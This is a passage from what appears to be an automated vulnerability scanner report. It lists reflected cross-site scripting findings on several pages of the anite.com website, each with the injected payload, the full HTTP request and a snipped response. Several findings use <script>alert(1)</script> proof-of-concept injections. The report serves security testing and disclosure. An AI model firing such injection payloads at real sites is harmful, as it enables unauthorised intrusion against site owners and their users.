The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453e3"><a>89cb6a8272d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-customers.html?453e3"><a>89cb6a8272d=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:14:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/travel-customers.html?453e3"><a>89cb6a8272d=1#up">
...[SNIP]...

1.221. http://anite.com/travel-management-team.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/travel-management-team.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c0fa"><a>28085e3236c was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-management-team.html?Itemid=2626c0fa"><a>28085e3236c HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/travel-management-team.html?Itemid=2626c0fa"><a>28085e3236c#up">
...[SNIP]...

1.222. http://anite.com/travel-management-team.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/travel-management-team.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ed32"><script>alert(1)</script>3e4c9746bf4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /9ed32"><script>alert(1)</script>3e4c9746bf4 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:15:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/9ed32"><script>alert(1)</script>3e4c9746bf4#up">
...[SNIP]...

1.223. http://anite.com/travel-management-team.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/travel-management-team.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a09b4"><a>669d92d0008 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-management-team.html?a09b4"><a>669d92d0008=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:14:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/travel-management-team.html?a09b4"><a>669d92d0008=1#up">
...[SNIP]...

1.224. http://anite.com/travel-office-locations.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/travel-office-locations.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ae58"><a>ccda20b06e5 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-office-locations.html?Itemid=4861ae58"><a>ccda20b06e5 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/travel-office-locations.html?Itemid=4861ae58"><a>ccda20b06e5#up">
...[SNIP]...

1.225. http://anite.com/travel-office-locations.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/travel-office-locations.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 101d7"><script>alert(1)</script>6cd3e10c0e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /101d7"><script>alert(1)</script>6cd3e10c0e6 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:15:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/101d7"><script>alert(1)</script>6cd3e10c0e6#up">
...[SNIP]...

1.226. http://anite.com/travel-office-locations.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/travel-office-locations.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e63ad"><a>b5a52c592f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-office-locations.html?e63ad"><a>b5a52c592f2=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/travel-office-locations.html?e63ad"><a>b5a52c592f2=1#up">
...[SNIP]...

1.227. http://anite.com/travel-partners.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/travel-partners.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54e72"><a>170f97da748 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-partners.html?Itemid=26154e72"><a>170f97da748 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:15:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/travel-partners.html?Itemid=26154e72"><a>170f97da748#up">
...[SNIP]...

1.228. http://anite.com/travel-partners.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/travel-partners.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7c57"><script>alert(1)</script>9f53744cff0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e7c57"><script>alert(1)</script>9f53744cff0 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:15:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/e7c57"><script>alert(1)</script>9f53744cff0#up">
...[SNIP]...

1.229. http://anite.com/travel-partners.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/travel-partners.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe1d7"><a>348067d19c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-partners.html?fe1d7"><a>348067d19c5=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:14:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/travel-partners.html?fe1d7"><a>348067d19c5=1#up">
...[SNIP]...

1.230. http://anite.com/travel-solutions.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/travel-solutions.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25a62"><a>36cf7e0efba was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-solutions.html?Itemid=21025a62"><a>36cf7e0efba HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31184

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/travel-solutions.html?Itemid=21025a62"><a>36cf7e0efba#up">
...[SNIP]...

1.231. http://anite.com/travel-solutions.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/travel-solutions.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 252d9"><script>alert(1)</script>db728fb98cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /252d9"><script>alert(1)</script>db728fb98cf?Itemid=210 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34409

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/252d9"><script>alert(1)</script>db728fb98cf?Itemid=210#up">
...[SNIP]...

1.232. http://anite.com/travel-solutions.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/travel-solutions.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8546d"><a>9b4f34ca359 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-solutions.html?Itemid=210&8546d"><a>9b4f34ca359=1 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34422

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/travel-solutions.html?Itemid=210&8546d"><a>9b4f34ca359=1#up">
...[SNIP]...

1.233. http://anite.com/travel-technology-solutions-anite-plc-3.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/travel-technology-solutions-anite-plc-3.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8297d"><a>69b14a6ab3b was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-technology-solutions-anite-plc-3.html?Itemid=2668297d"><a>69b14a6ab3b HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:13:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/travel-technology-solutions-anite-plc-3.html?Itemid=2668297d"><a>69b14a6ab3b#up">
...[SNIP]...

1.234. http://anite.com/travel-technology-solutions-anite-plc-3.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/travel-technology-solutions-anite-plc-3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8325d"><script>alert(1)</script>1b36e4467e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8325d"><script>alert(1)</script>1b36e4467e3 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:13:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

